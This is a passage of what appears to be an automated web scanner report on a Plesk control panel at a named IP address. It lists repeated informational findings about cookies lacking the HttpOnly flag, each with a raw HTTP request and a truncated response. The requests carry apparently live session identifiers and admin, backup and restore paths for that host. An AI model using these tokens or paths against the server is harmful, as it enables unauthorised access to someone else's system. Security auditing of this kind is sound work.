Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:53:29 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=credentials-info; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:53:30 GMT
Connection: close
Content-Length: 29374

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.79. https://50.22.21.242:8443/plesk/admin-password/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/admin-password/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin-password/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:53:28 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=credentials-info; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:53:28 GMT
Connection: close
Content-Length: 18267

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.80. https://50.22.21.242:8443/plesk/admin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/admin/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=xvrjftqfoptegfsokqpykqdf; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:39:01 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:39:02 GMT
Connection: close
Content-Length: 20533

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.81. https://50.22.21.242:8443/plesk/admin/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/admin/report/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin/report/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: admin_report__report_id=2; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:00:15 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: admin_report__report_id=2
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:00:15 GMT
Content-Length: 25591

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.82. https://50.22.21.242:8443/plesk/admin/report/traffic-history/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/admin/report/traffic-history/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin/report/traffic-history/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; psaContext=tools

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:07:46 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:07:45 GMT
Connection: close
Content-Length: 13640

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.83. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/create/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/create/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/create/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:58:52 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:58:52 GMT
Content-Length: 18301

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.84. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/ftp-repository/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/ftp-repository/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/ftp-repository/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:58:32 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:58:33 GMT
Connection: close
Content-Length: 21612

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.85. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/ftp-repository/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/ftp-repository/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/ftp-repository/properties/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/ftp-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:54:12 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=personal-info; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:54:12 GMT
Connection: close
Content-Length: 17353

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.86. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/web/view
Cookie: PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:58:37 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:58:38 GMT
Content-Length: 21529

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.87. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/restore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:26 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:28 GMT
Connection: close
Content-Length: 19780

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.88. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/restore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:47 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:47 GMT
Connection: close
Content-Length: 13756

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.89. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/restore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:28 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:29 GMT
Connection: close
Content-Length: 19814

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.90. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/restore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:23 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:25 GMT
Connection: close
Content-Length: 19780

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.91. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/restore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:50 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:51 GMT
Connection: close
Content-Length: 19828

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.92. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/restore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
